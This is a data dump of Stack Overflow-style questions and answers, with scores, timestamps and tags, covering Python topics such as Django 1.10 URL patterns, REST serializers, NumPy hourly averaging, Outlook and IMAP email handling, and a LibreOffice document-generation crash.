File "/Users/alasdair/dev/urlproject/urlproject/urls.py", line 28, in <module>
url(r'^$', 'myapp.views.home'),
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/conf/urls/__init__.py", line 85, in url
raise TypeError('view must be a callable or a list/tuple in the case of include().')
TypeError: view must be a callable or a list/tuple in the case of include().
</code></pre>
| 6 | 2016-08-03T12:54:34Z | 38,744,286 | <p>Django 1.10 no longer allows you to specify views as a string (e.g. <code>'myapp.views.home'</code>) in your URL patterns.</p>
<p>The solution is to update your <code>urls.py</code> to include the view callable. This means that you have to import the view in your <code>urls.py</code>. If your URL patterns don't have names, then now is a good time to add one, because reversing with the dotted python path no longer works.</p>
<pre><code>from django.contrib.auth.views import login
from myapp.views import home, contact
urlpatterns = [
url(r'^$', home, name='home'),
url(r'^contact$', contact, name='contact'),
url(r'^login/$', login, name='login'),
]
</code></pre>
<p>If there are many views, then importing them individually can be inconvenient. An alternative is to import the views module from your app. </p>
<pre><code>from django.contrib.auth import views as auth_views
from myapp import views as myapp_views
urlpatterns = [
url(r'^$', myapp_views.home, name='home'),
url(r'^contact$', myapp_views.contact, name='contact'),
url(r'^login/$', auth_views.login, name='login'),
]
</code></pre>
<p>Note that we have used <code>as myapp_views</code> and <code>as auth_views</code>, which allows us to import the <code>views.py</code> from multiple apps without them clashing.</p>
<p>See the <a href="https://docs.djangoproject.com/en/1.10/topics/http/urls/#url-dispatcher">Django URL dispatcher docs</a> for more information about <code>urlpatterns</code>.</p>
| 20 | 2016-08-03T12:54:34Z | [
"python",
"django",
"django-urls",
"django-1.10"
] |
Django URLs error: view must be a callable or a list/tuple in the case of include() | 38,744,285 | <p>After upgrading to Django 1.10, I get the error:</p>
<pre><code>TypeError: view must be a callable or a list/tuple in the case of include().
</code></pre>
<p>My urls.py is as follows:</p>
<pre><code>urlpatterns = [
url(r'^$', 'myapp.views.home'),
url(r'^contact$', 'myapp.views.contact'),
url(r'^login/$', 'django.contrib.auth.views.login'),
]
</code></pre>
<p>The full traceback is:</p>
<pre><code>Traceback (most recent call last):
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/autoreload.py", line 226, in wrapper
fn(*args, **kwargs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/commands/runserver.py", line 121, in inner_run
self.check(display_num_errors=True)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/base.py", line 385, in check
include_deployment_checks=include_deployment_checks,
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/base.py", line 372, in _run_checks
return checks.run_checks(**kwargs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/registry.py", line 81, in run_checks
new_errors = check(app_configs=app_configs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/urls.py", line 14, in check_url_config
return check_resolver(resolver)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/urls.py", line 24, in check_resolver
for pattern in resolver.url_patterns:
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/functional.py", line 35, in __get__
res = instance.__dict__[self.name] = self.func(instance)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/urls/resolvers.py", line 310, in url_patterns
patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/functional.py", line 35, in __get__
res = instance.__dict__[self.name] = self.func(instance)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/urls/resolvers.py", line 303, in urlconf_module
return import_module(self.urlconf_name)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/importlib/__init__.py", line 37, in import_module
__import__(name)
File "/Users/alasdair/dev/urlproject/urlproject/urls.py", line 28, in <module>
url(r'^$', 'myapp.views.home'),
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/conf/urls/__init__.py", line 85, in url
raise TypeError('view must be a callable or a list/tuple in the case of include().')
TypeError: view must be a callable or a list/tuple in the case of include().
</code></pre>
| 6 | 2016-08-03T12:54:34Z | 38,837,787 | <p>This error just means that <code>myapp.views.home</code> is not something that can be called, like a function; it is in fact a string. While this style works in Django 1.9, it throws a deprecation warning there saying it will stop working from version 1.10 onwards, which is exactly what has happened. The previous solution by @Alasdair imports the necessary view functions into the script through either
<code>from myapp import views as myapp_views</code> or
<code>from myapp.views import home, contact</code></p>
| 1 | 2016-08-08T20:16:22Z | [
"python",
"django",
"django-urls",
"django-1.10"
] |
Custom serializer issue in django with json data | 38,744,349 | <p>I can't get my serializer to work correctly on a foreign key field; any help would be greatly appreciated.</p>
<p>Here is the error </p>
<p>dim_json = DimensionSerializer(dim_data) </p>
<p>print dim_json </p>
<p>DimensionSerializer([, , , , , ]): </p>
<pre><code>id = IntegerField(label='ID', read_only=True)
description = CharField(max_length=255)
style = CharField(max_length=255)
created_at = DateField()
updated_at = DateField()
target = IntegerField()
upper_limit = IntegerField()
lower_limit = IntegerField()
inspection_tool = CharField(max_length=255)
critical = IntegerField()
units = CharField(max_length=255)
metric = CharField(max_length=255)
target_strings = CharField(max_length=255)
ref_dim_id = IntegerField()
nested_number = IntegerField()
met_upper = IntegerField()
met_lower = IntegerField()
valc = CharField(max_length=255)
sheet = PrimaryKeyRelatedField(queryset=Sheet.objects.all(), required=False)
</code></pre>
<p>serializers.py </p>
<pre><code>from rest_framework import serializers
from app.models import Dimension, Sheet, Customer
class DimensionSerializer(serializers.ModelSerializer):
description = serializers.CharField(max_length=255)
style = serializers.CharField(max_length=255)
created_at = serializers.DateField()
updated_at = serializers.DateField()
target = serializers.IntegerField()
upper_limit = serializers.IntegerField()
lower_limit = serializers.IntegerField()
inspection_tool = serializers.CharField(max_length=255)
critical = serializers.IntegerField()
units = serializers.CharField(max_length=255)
metric = serializers.CharField(max_length=255)
target_strings = serializers.CharField(max_length=255)
ref_dim_id = serializers.IntegerField()
nested_number = serializers.IntegerField()
#position = serializers.IntegerField()
met_upper = serializers.IntegerField()
met_lower = serializers.IntegerField()
valc = serializers.CharField(max_length=255)
# I found this with a google search but it still does not work and continues to give the error
sheet = SheetSerializer(many=True)
class Meta:
model = Dimension
read_only_fields = ('id', 'created_at', 'updated_at', 'posistion', sheet)
class SheetSerializer(serializers.ModelSerializer):
create_date = serializers.DateField()
updated_date = serializers.DateField()
customer_name = serializers.CharField(max_length=255)
part_number = serializers.CharField(max_length=255)
part_revision = serializers.CharField(max_length=255)
work_order = serializers.CharField(max_length=255)
purchase_order = serializers.CharField(max_length=255)
sample_size = serializers.IntegerField()
sample_scheme = serializers.CharField(max_length=255)
overide_scheme = serializers.IntegerField()
template = serializers.IntegerField()
sample_schem_percent = serializers.IntegerField()
critical_dimensions = serializers.IntegerField()
closed = serializers.IntegerField()
serial_index = serializers.CharField(max_length=255)
drawing_number = serializers.CharField(max_length=255)
drawing_revision = serializers.CharField(max_length=255)
heat_number = serializers.CharField(max_length=255)
note = serializers.CharField(max_length=255)
valc = serializers.CharField(max_length=255)
customer = CustomerSerializer(many=True)
class Meta:
model = Sheet
read_only_fields = ('id', 'create_date', 'updated_at')
class CustomerSerializer(serializers.ModelSerializer):
customer_id = serializers.IntegerField()
customer_name = serializers.CharField(max_length=255)
created_at = serializers.DateField()
updated_at = serializers.DateField()
</code></pre>
<p>models.py </p>
<pre><code>class Dimension(models.Model):
description = models.CharField(max_length=255)
style = models.CharField(max_length=255)
created_at = models.DateField()
updated_at = models.DateField()
target = models.IntegerField()
upper_limit = models.IntegerField()
lower_limit = models.IntegerField()
inspection_tool = models.CharField(max_length=255)
critical = models.IntegerField()
units = models.CharField(max_length=255)
metric = models.CharField(max_length=255)
target_strings = models.CharField(max_length=255)
ref_dim_id = models.IntegerField()
nested_number = models.IntegerField()
met_upper = models.IntegerField()
met_lower = models.IntegerField()
valc = models.CharField(max_length=255)
sheet = models.ForeignKey(Sheet, on_delete=models.CASCADE, default=DEFAULT_FOREIGN_KEY)
class Customer(models.Model):
objects = CustomerManager()
customer_id = models.IntegerField()
customer_name = models.CharField(max_length=255)
created_at = models.DateField
updated_at = models.DateField
class Sheet(models.Model):
objects = SheetManager()
create_date = models.DateField()
updated_date = models.DateField()
customer_name = models.CharField(max_length=255)
part_number = models.CharField(max_length=255)
part_revision = models.CharField(max_length=255)
work_order = models.CharField(max_length=255)
purchase_order = models.CharField(max_length=255)
sample_size = models.IntegerField()
sample_scheme = models.CharField(max_length=255)
overide_scheme = models.IntegerField()
template = models.IntegerField()
sample_schem_percent = models.IntegerField()
critical_dimensions = models.IntegerField()
closed = models.IntegerField()
serial_index = models.CharField(max_length=255)
drawing_number = models.CharField(max_length=255)
drawing_revision = models.CharField(max_length=255)
heat_number = models.CharField(max_length=255)
note = models.CharField(max_length=255)
valc = models.CharField(max_length=255)
customer = models.ForeignKey(Customer, on_delete=models.CASCADE, default=DEFAULT_FOREIGN_KEY)
</code></pre>
| -1 | 2016-08-03T12:57:04Z | 38,747,901 | <p>I figured it out: instead of using my custom serializer, I just used the one from <code>django.core</code> and presto, it works.</p>
<pre><code>from django.core import serializers

dim_json = serializers.serialize('json', Dimension.objects.all())
print dim_json
</code></pre>
| 0 | 2016-08-03T15:31:14Z | [
"python",
"json",
"django",
"django-serializer"
] |
Numpy array 15min values - hourly mean values | 38,744,353 | <p>I have the following situation:</p>
<p>A numpy array</p>
<pre><code>x = np.array([12,3,34,5...,])
</code></pre>
<p>where every entry corresponds to a simulation result (time-step 15min).</p>
<p>Now I need the mean hourly value (mean value of first 4 elements, then next 4, etc.) stored in a new numpy array. Is there a very simple method to accomplish this?</p>
| 2 | 2016-08-03T12:57:16Z | 38,744,446 | <pre><code>import numpy as np

N = 4  # four 15-minute samples per hour
mod_ = x.size % N
# pad the tail with NaNs so the length becomes a multiple of N
x1 = np.pad(x.astype(float), (0, (mod_ > 0) * (N - mod_)), 'constant', constant_values=(np.nan,))
x2 = x1.reshape(-1, N)
x3 = np.nanmean(x2, axis=1)  # np.nanmean ignores the NaN padding
print(x3)
</code></pre>
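<p>As a quick check of the padding-and-reshape approach with a 5-element input (a sketch; it assumes <code>numpy</code> is importable as <code>np</code>):</p>

```python
import numpy as np

x = np.array([12, 3, 34, 5, 1])
N = 4
pad = (-x.size) % N  # number of NaNs needed to reach a multiple of N
x1 = np.pad(x.astype(float), (0, pad), 'constant', constant_values=np.nan)
hourly = np.nanmean(x1.reshape(-1, N), axis=1)
print(hourly)  # hourly means: 13.5 and 1.0
```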
| 1 | 2016-08-03T13:01:35Z | [
"python",
"numpy"
] |
Numpy array 15min values - hourly mean values | 38,744,353 | <p>I have the following situation:</p>
<p>A numpy array</p>
<pre><code>x = np.array([12,3,34,5...,])
</code></pre>
<p>where every entry corresponds to a simulation result (time-step 15min).</p>
<p>Now I need the mean hourly value (mean value of first 4 elements, then next 4, etc.) stored in a new numpy array. Is there a very simple method to accomplish this?</p>
| 2 | 2016-08-03T12:57:16Z | 38,744,742 | <p>To handle arrays whose size may not be a multiple of 4,
copy <code>x</code> into a new array, <code>tmp</code>, whose size is a multiple of 4:</p>
<pre><code>tmp = np.full((((x.size-1) // 4)+1)*4, dtype=float, fill_value=np.nan)
tmp[:x.size] = x
</code></pre>
<p>Empty values are represented by <code>nan</code>. Then you can reshape and use <code>nanmean</code> to compute the mean for each row. <code>np.nanmean</code> is like <code>np.mean</code> except that it ignores <code>nan</code>s:</p>
<hr>
<pre><code>x = np.array([12,3,34,5,1])
tmp = np.full((((x.size-1) // 4)+1)*4, dtype=float, fill_value=np.nan)
tmp[:x.size] = x
tmp = tmp.reshape(-1, 4)
print(np.nanmean(tmp, axis=1))
</code></pre>
<p>prints</p>
<pre><code>[ 13.5 1. ]
</code></pre>
<hr>
<p>If you have <a href="http://pandas.pydata.org/" rel="nofollow">pandas</a> installed, then you could build a timeseries and group by a time interval:</p>
<pre><code>import numpy as np
import pandas as pd
x = np.array([12,3,34,5,1])
s = pd.Series(x, index=pd.date_range('2000-1-1', periods=x.size, freq='15T'))
result = s.groupby(pd.TimeGrouper('1H')).mean()
print(result)
</code></pre>
<p>yields</p>
<pre><code>2000-01-01 00:00:00 13.5
2000-01-01 01:00:00 1.0
Freq: H, dtype: float64
</code></pre>
| 2 | 2016-08-03T13:14:54Z | [
"python",
"numpy"
] |
Numpy array 15min values - hourly mean values | 38,744,353 | <p>I have the following situation:</p>
<p>A numpy array</p>
<pre><code>x = np.array([12,3,34,5...,])
</code></pre>
<p>where every entry corresponds to a simulation result (time-step 15min).</p>
<p>Now I need the mean hourly value (mean value of first 4 elements, then next 4, etc.) stored in a new numpy array. Is there a very simple method to accomplish this?</p>
| 2 | 2016-08-03T12:57:16Z | 38,746,311 | <p>Here is another solution:</p>
<p>your input:</p>
<pre><code>In [11]: x = np.array([12, 3, 34, 5, 1, 2, 3])
</code></pre>
<p>taking every 4 elements in b</p>
<pre><code>In [12]: b = [x[n:n+4] for n in range(0, len(x), 4)]
</code></pre>
<p>create new empty list to append results</p>
<pre><code>In [13]: l = []
In [14]: for i in b:
....: l.append(np.mean(i))
....:
In [15]: l
Out[15]: [13.5, 2.0]
</code></pre>
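<p>The loop-and-append part can also be collapsed into a single list comprehension. A pure-Python equivalent (no numpy needed; assumes <code>x</code> is a plain list) would be:</p>

```python
x = [12, 3, 34, 5, 1, 2, 3]

# mean of every chunk of 4 consecutive samples; the last chunk may be shorter
means = [sum(chunk) / float(len(chunk))
         for chunk in (x[n:n + 4] for n in range(0, len(x), 4))]
print(means)  # [13.5, 2.0]
```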
| 1 | 2016-08-03T14:22:09Z | [
"python",
"numpy"
] |
Tkinter Text widget: Configure font | 38,744,394 | <p>I have <code>Text</code> widget that I can configure the font families by:</p>
<pre><code>textwidget.config(font=(Consolas,13))
</code></pre>
<p>That would configure the whole <code>Text</code> widget. I only want to tell <code>Tkinter</code> that every input typed after the <code>Text</code> widget has been configured should look like what I changed it to.</p>
<p>How can I achieve this? Thanks for any help!</p>
| 0 | 2016-08-03T12:59:10Z | 38,781,382 | <p>Have a look at the <code>tag</code> commands. You can change the selected text using this code:</p>
<pre><code>number = 0

def fontchange():
    global number  # number is rebound below, so it must be declared global
    textwidget.tag_add(str(number), SEL_FIRST, SEL_LAST)
    textwidget.tag_config(str(number), font=(Consolas, 13))
    number += 1
</code></pre>
<p>Obviously this is a very basic changer but if you want to change it to the end you could change the SEL_LAST to END. Read this <a href="http://effbot.org/tkinterbook/text.htm" rel="nofollow">site</a> for more info on tags.</p>
| 1 | 2016-08-05T04:54:39Z | [
"python",
"text",
"fonts",
"tkinter",
"configuration"
] |
How to test `@authenticated` handler using tornado.testing? | 38,744,453 | <p>I am new to unit testing using script. I tried to verify login with arguments in post data, but I am getting login page as response and not get logged in.Because of <code>@tornado.web.authenticated</code> i can't access other functions without login and it responding to login page</p>
<pre><code>import tornado
from tornado.testing import AsyncTestCase
from tornado.web import Application, RequestHandler
from tornado.httpclient import AsyncHTTPClient
import app
import urllib
class MyTestCase(AsyncTestCase):
@tornado.testing.gen_test
def test_http_fetch_login(self):
data = urllib.urlencode(dict(username='admin', password=''))
client = AsyncHTTPClient(self.io_loop)
response = yield client.fetch("http://localhost:8888/console/login/?", method="POST",body=data)
# Test contents of response
self.assertIn("Automaton web console", response.body)
@tornado.testing.gen_test
def test_http_fetch_config(self):
client = AsyncHTTPClient(self.io_loop)
response = yield client.fetch("http://localhost:8888/console/configuration/?")
self.assertIn("server-version",response.body)
</code></pre>
| 0 | 2016-08-03T13:01:55Z | 38,778,310 | <p>To test code that uses <code>@authenticated</code> (unless you are testing the redirection to the login page itself), you need to pass a cookie (or whatever form of authentication you're using) that will be accepted by your <code>get_current_user</code> method. The details of this will vary depending on how exactly you are doing your authentication, but if you're using Tornado's secure cookies you'll probably use the <code>create_signed_value</code> function to encode a cookie. </p>
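<p>A rough sketch of that approach (the cookie name <code>user</code> is an assumption: it must match whatever your login handler passes to <code>set_secure_cookie()</code>, and your <code>Application</code> needs a <code>cookie_secret</code> in its settings):</p>

```python
from tornado.web import create_signed_value

def login_headers(application, username):
    """Build request headers carrying a forged secure cookie that
    get_current_user() will accept, without going through the login form."""
    secret = application.settings["cookie_secret"]
    cookie = create_signed_value(secret, "user", username)
    return {"Cookie": "user=" + cookie.decode()}
```

<p>Inside an <code>AsyncHTTPTestCase</code> you could then call something like <code>self.fetch('/console/configuration/', headers=login_headers(self._app, 'admin'))</code>.</p>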
| 0 | 2016-08-04T22:20:14Z | [
"python",
"unit-testing",
"web-applications",
"tornado"
] |
AssertionError: negative sum of square deviations | 38,744,648 | <p>As part of a larger project, I am writing a function that takes in a dict of dicts of ints and returns a dict with each "outer" key linked to a tuple of the mean and standard deviation of that sub dictionary (i.e. <code>(mean(dict[key1]), stdev(dict[key1]))</code> ). I am operating on a large dataset (the source file is a 2.8 GB csv file) and am getting an Assertion Error while calculating the standard deviation of one of the sub dicts. </p>
<p>While I will (and currently am) tracking down the sub dict that caused the error below, I'm curious about what general situation could cause it so I can try to avoid it if it happens further into my dataset.</p>
<p>The error message I receive is: </p>
<p><code>AssertionError: negative sum of square deviations: -3734262324235.697754</code> </p>
<p>from the code:</p>
<pre><code>import statistics as stat
try: #Check for single value error
std = stat.stdev(val)
except stat.StatisticsError:
std = 0
</code></pre>
| 1 | 2016-08-03T13:10:28Z | 38,745,780 | <p>The code in <code>statistics.py</code> is pure Python - you seem to be a victim of a weird overflow error in the <code>Fraction</code> class when processing data in the internal "sum of squares" function, <code>statistics._ss</code>.</p>
<p>I think the best thing you can do now is to instrument the <code>_ss</code> function in the <code>statistics.py</code> file itself with an "if" and a call to <code>pdb.set_trace()</code>, to find interactively which data is causing the errors (there is a comment in the code that this part is subject to rounding errors). It calculates a fraction that should be zero but for rounding errors, and squares that fraction. Upon squaring, the already large denominator is squared itself - which is probably triggering a bug inside Python's <code>Fraction</code>, returning an extremely large value when it should be just close to zero.</p>
<p>Such an "if" clause can allow you to (1) bypass the error condition and run your code to the end, forcing the value to zero when the error is found; (2) note down the values that cause the error, and report that as a bug to the Python language itself.</p>
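<p>Until the root cause is tracked down, option (1) can also be done at the call site instead of inside <code>statistics.py</code>: catch the <code>AssertionError</code> as well and force the value to zero (a sketch; whether zero is an acceptable fallback depends on your analysis):</p>

```python
import statistics as stat

def safe_stdev(values):
    """stdev() that degrades to 0.0 instead of raising."""
    try:
        return stat.stdev(values)
    except stat.StatisticsError:  # fewer than two data points
        return 0.0
    except AssertionError:  # "negative sum of square deviations" rounding bug
        return 0.0

print(safe_stdev([1, 2, 3]))  # 1.0
print(safe_stdev([5]))        # 0.0
```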
| 2 | 2016-08-03T13:59:57Z | [
"python",
"python-3.x",
"dictionary",
"statistics",
"standard-deviation"
] |
How do I search for a specific Outlook email in python | 38,744,747 | <p>I have the following code which works, it can read the most recent Email in my outlook inbox and print the body of that message. However, I want to be able to specify a static Email address, and return all of the messages from that person. How would I change the code to do that?</p>
<pre class="lang-python prettyprint-override"><code>outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI")
inbox = outlook.GetDefaultFolder(6)
messages = inbox.Items
message = messages.Getlast
body_content = message.body
print body_content
</code></pre>
<p>I figured it would be as easy as changing 'messages.Getlast' to something like 'messages.Get('Email address here') but no luck with that.</p>
<p>Thanks in advance for any help.</p>
| 0 | 2016-08-03T13:15:19Z | 38,746,159 | <p>You already have a script that allows you to obtain the list of messages in a folder:</p>
<pre><code>outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI")
inbox = outlook.GetDefaultFolder(6)
messages = inbox.Items
</code></pre>
<p>Once you have got all the messages, you just have to check whether the message sender is the one you are looking for:</p>
<pre><code>sender = "my_sender"
sender = sender.lower()
for message in messages:
if sender in message.sender.lower():
        # This message was sent by sender
print message.body
</code></pre>
<p>That code should print the body of every message in <code>messages</code> where <code>sender</code> is contained in <code>message.sender</code>.</p>
<p>I have added the <code>lower()</code> call to avoid case-sensitivity problems. You might want to remove it.</p>
<p>Hope it will help.</p>
| 0 | 2016-08-03T14:15:55Z | [
"python",
"email",
"outlook",
"python-2.x"
] |
django add foreign key value after form submit | 38,744,752 | <p>After a <code>ModelForm</code> has been submitted, how can I add a foreign key relation so that it validates?</p>
<p><code>models.py</code></p>
<pre><code>class Comment(models.Model):
id = models.AutoField(primary_key=True)
activity = models.ForeignKey(Activity)
submitter = models.ForeignKey(User)
creation_date = models.DateTimeField(auto_now_add=True)
content = models.TextField()
</code></pre>
<p><code>forms.py</code></p>
<pre><code>class CommentForm(forms.ModelForm):
content = forms.CharField(widget=forms.Textarea)
class Meta:
model = Comment
</code></pre>
<p><code>views.py</code></p>
<pre><code>def index(request, id=None):
activity_instance = Activity.objects.get(pk=1)
submitter_instance = User.objects.get(id=1)
newComment = CommentForm(request.POST)
newComment.activity = activity_instance
newComment.submitter = submitter_instance
if newComment.is_valid(): # <-- false, which is the problem
</code></pre>
| 1 | 2016-08-03T13:15:28Z | 38,744,948 | <p>I think you are mixing up a form instance with a model instance. Your <code>newComment</code> is a form; assigning other objects as form attributes will not make the form save the foreign keys (I'm not sure where you found this usage), because all form data is kept in <code>form.data</code>, which is a dict-like data structure.</p>
<p>I'm not sure what does your form look like because you didn't exclude the foreign keys so they should be rendered as dropdowns and you could select them. If you don't want the user to select the foreign key but choose to assign the values as you currently do, you should exclude them in the form so <code>form.is_valid()</code> would pass:</p>
<pre><code>class CommentForm(forms.ModelForm):
content = forms.CharField(widget=forms.Textarea)
class Meta:
model = Comment
exclude = ('activity', 'submitter')
</code></pre>
<p>views.py</p>
<pre><code>def index(request, id=None):
activity_instance = Activity.objects.get(pk=1)
submitter_instance = User.objects.get(id=1)
comment_form = CommentForm(request.POST)
if comment_form.is_valid():
new_comment = comment_form.save(commit=False)
new_comment.activity = activity_instance
new_comment.submitter = submitter_instance
new_comment.save()
</code></pre>
<p>Django doc <a href="https://docs.djangoproject.com/en/1.9/topics/forms/modelforms/#the-save-method" rel="nofollow">about <code>save()</code> method</a>.</p>
| 4 | 2016-08-03T13:25:02Z | [
"python",
"django"
] |
Django server crashes with exit codes 139, 77 | 38,744,818 | <h2>Foreword</h2>
<p>Okay, I have a really complex performance issue. I'm building a content management system and one of the features should be generating tons of <code>.docx</code> files with different templates. I started with <a href="https://pythonhosted.org/django-webodt/quickstart.html" rel="nofollow">Webodt</a> + Abiword. But then templates got too complex, so I had to switch my backend to <a href="http://templated-docs.readthedocs.io/en/latest/index.html" rel="nofollow">Templated-docs</a> + LibreOffice. This is where my problems started.</p>
<p>I use:</p>
<ul>
<li>Python 2.7.12</li>
<li>Django==1.8.2</li>
<li>templated-docs==0.2.9</li>
<li>LibreOffice 5.1.5.2</li>
<li>Ubuntu 16.04</li>
</ul>
<h2>The actual problem</h2>
<p>I have an API which handles <code>.docx</code> render. I will show one of views, as an example, they are pretty similar:</p>
<pre><code>@permission_classes((permissions.IsAdminUser,))
class BookDocxViewSet(mixins.RetrieveModelMixin, viewsets.GenericViewSet):
def retrieve(self, request, *args, **kwargs):
queryset = Pupils.objects.get(id=kwargs['pk'])
serializer = StudentSerializer(queryset)
context = dict(serializer.data)
doc = fill_template('crm/docs/book.ott', context, output_format='docx')
p = u'docs/books/%s/%s_%s_%s.doc' % (datetime.now().date(), context[u'surname'], context[u'name'], datetime.now().date())
with open(doc, 'rb') as f:
content = f.read()
path = default_storage.save(p, ContentFile(content))
f.close()
return response.Response(u'/media/' + path)
</code></pre>
<p>When I call it the first time, it creates a <code>.docx</code> file, saves it to my <code>default_storage</code> and then returns me a download link. But when I try to do it again, or do it with another method (which works with another template and context), my server just crashes without any logs. The last thing I see is either </p>
<ol>
<li><code>Process finished with exit code 77</code> if I call it with a little delay (more than one second)</li>
<li><code>Process finished with exit code 139 (interrupted by signal 11: SIGSEGV)</code> if I call my method for the second time right away (in less than one second)</li>
</ol>
<p>I tried to use a debugger -- it said that my server crashes on this line:</p>
<p><code>doc = fill_template('crm/docs/book.ott', context, output_format='docx')</code></p>
<p>I bet what happens is:</p>
<ol>
<li>When I call my method the first time <code>templated_docs</code> starts LibreOffice backend, and then <strong>does not stop it</strong></li>
<li>When I call my method the second time <code>templated_docs</code> tries to start LibreOffice backend again, but it is already busy.</li>
</ol>
<h2>Questions</h2>
<ol>
<li><strike>How do I debug LibreOffice to prove / refute my theory?</strike> <em>(I guess I need to debug <code>templated_docs</code> instead)</em></li>
<li>Why do I get different exit codes depending on the delay?</li>
<li>Is this enough grounds to open an <a href="https://github.com/alexmorozov/templated-docs/issues" rel="nofollow">issue</a> on GitHub?</li>
<li>How do I fix that?</li>
</ol>
<hr>
<h2>UPD</h2>
<p>It is not an issue of REST Framework or not using <code>FileResponce()</code>.
I already tried to test it with regular view.</p>
<pre><code>def get_document(request, *args, **kwargs):
context = Pupils.objects.get(id=kwargs['pk']).__dict__
doc = fill_template('crm/docs/book.ott', context, output_format='docx')
p = u'%s_%s_%s' % (context[u'surname'], context[u'name'], datetime.now().date())
return FileResponse(doc, p)
</code></pre>
<p>And the problem is the same.</p>
<hr>
<h2>UPD 2</h2>
<p>Okay. This line is crashing my server:</p>
<pre><code># pylokit/lokit.py
self.lokit = lo.libreofficekit_hook(six.b(lo_path))
</code></pre>
| 1 | 2016-08-03T13:18:48Z | 38,749,701 | <p>Okay, that was a bug in <code>templated_docs</code>. I was right: it happens because <code>templated_docs</code> is trying to start LibreOffice twice. As is said in the <code>pylokit</code> <a href="https://github.com/xrmx/pylokit#examples" rel="nofollow">documentation</a>:</p>
<blockquote>
<p>The use of _exit() instead of default exit() is required because in
some circumstances LibreOffice segfaults on process exit.</p>
</blockquote>
<p>It means the process that used <code>pylokit</code> should be killed afterwards. But we cannot kill the Django server, so I decided to use multiprocessing:</p>
<pre><code># templated_docs/__init__.py
# (the patch also needs: from multiprocessing import Pipe, Process)
if source_extension[1:] != output_format:
lo_path = getattr(
settings,
'TEMPLATED_DOCS_LIBREOFFICE_PATH',
'/usr/lib/libreoffice/program/')
def f(conn):
with Office(lo_path) as lo:
conv_file = NamedTemporaryFile(delete=False,
suffix='.%s' % output_format)
with lo.documentLoad(str(dest_file.name)) as doc:
doc.saveAs(conv_file.name)
os.unlink(dest_file.name)
conn.send(conv_file.name)
conn.close()
parent_conn, child_conn = Pipe()
p = Process(target=f, args=(child_conn,))
p.start()
conv_file_name = parent_conn.recv()
p.join()
return conv_file_name
else:
return dest_file.name
</code></pre>
<p>I opened an <a href="https://github.com/alexmorozov/templated-docs/issues/3" rel="nofollow">issue</a> and made a <a href="https://github.com/alexmorozov/templated-docs/pull/4" rel="nofollow">pull request</a>.</p>
| 1 | 2016-08-03T17:03:04Z | [
"python",
"django",
"libreoffice"
] |
Python imaplib doesnt mark messages as unseen | 38,744,885 | <p>I am working on a function that collects data from email and has a switch to mark messages as unseen. During development it started to fail and I don't know why. I've looked it up in the documentation and searched Stack Overflow (got to <a href="http://stackoverflow.com/questions/17367611/python-imaplib-mark-email-as-unread-or-unseen">this</a> thread, but it didn't help). Anyway, this is the code:</p>
<pre><code> mail = imaplib.IMAP4_SSL('imap.gmail.com', '993')
mail.login(settings.INVOICES_LOGIN, settings.INVOICES_PASSWORD)
mail.select('inbox')
result, data = mail.uid('search', '(UNSEEN)', 'X-GM-RAW',
'SUBJECT: "{0}" FROM: "{1}"'.format(attachment_subject, attachment_from))
uids = data[0].split()
for uid in uids:
result, data = mail.uid('fetch', uid, '(RFC822)')
m = email.message_from_string(data[0][1])
if m.get_content_maintype() == 'multipart':
for part in m.walk():
if part.get_content_maintype() == 'multipart':
continue
if part.get('Content-Disposition') is None:
continue
if re.match(attachment_filename_re, part.get_filename()):
attachments.append({'uid': uid, 'data': part.get_payload(decode=True)})
if set_not_read:
mail.store(uid, '-FLAGS', '(\Seen)')
</code></pre>
<p>I've debugged it, I am sure that with this flag the <code>mail.store(uid, '-FLAGS', '(\Seen)')</code> part is entered, I've also tried switching to <code>\SEEN</code> and <code>\Seen</code> instead of (\Seen).</p>
<p>EDIT:</p>
<p>What I'm trying to do is make a script that allows the user to mark an email as <code>unseen</code> (not read), that is, reset the <code>Seen</code> flag, and that does not mark an email as <code>seen</code> (read).</p>
| 1 | 2016-08-03T13:21:50Z | 38,745,198 | <p>I believe you want</p>
<pre><code>mail.store(uid, '+FLAGS', '(\\Seen)')
</code></pre>
<p>I think what you're doing right now is <em>removing</em> the seen flag. But I'll look in the RFC to be sure.</p>
<p><strong>Edit:</strong> Yup. That's what the <a href="https://tools.ietf.org/html/rfc3501#page-59" rel="nofollow">RFC says</a></p>
<pre><code>-FLAGS <flag list>
Remove the argument from the flags for the message. The new
value of the flags is returned as if a FETCH of those flags was
done.
</code></pre>
<p>Other bits that you may find relevant:</p>
<pre><code>The currently defined data items that can be stored are:
FLAGS <flag list>
Replace the flags for the message (other than \Recent) with the
argument. The new value of the flags is returned as if a FETCH
of those flags was done.
FLAGS.SILENT <flag list>
Equivalent to FLAGS, but without returning a new value.
+FLAGS <flag list>
Add the argument to the flags for the message. The new value
of the flags is returned as if a FETCH of those flags was done.
+FLAGS.SILENT <flag list>
Equivalent to +FLAGS, but without returning a new value.
-FLAGS <flag list>
Remove the argument from the flags for the message. The new
value of the flags is returned as if a FETCH of those flags was
done.
-FLAGS.SILENT <flag list>
Equivalent to -FLAGS, but without returning a new value.
</code></pre>
| 1 | 2016-08-03T13:34:39Z | [
"python",
"imaplib"
] |
Preserve formatting when modifying an Excel (xlsx) file with Python | 38,744,952 | <p>Is there any Python module out there that can be used to create an Excel XLSX file replicating the format from a template?</p>
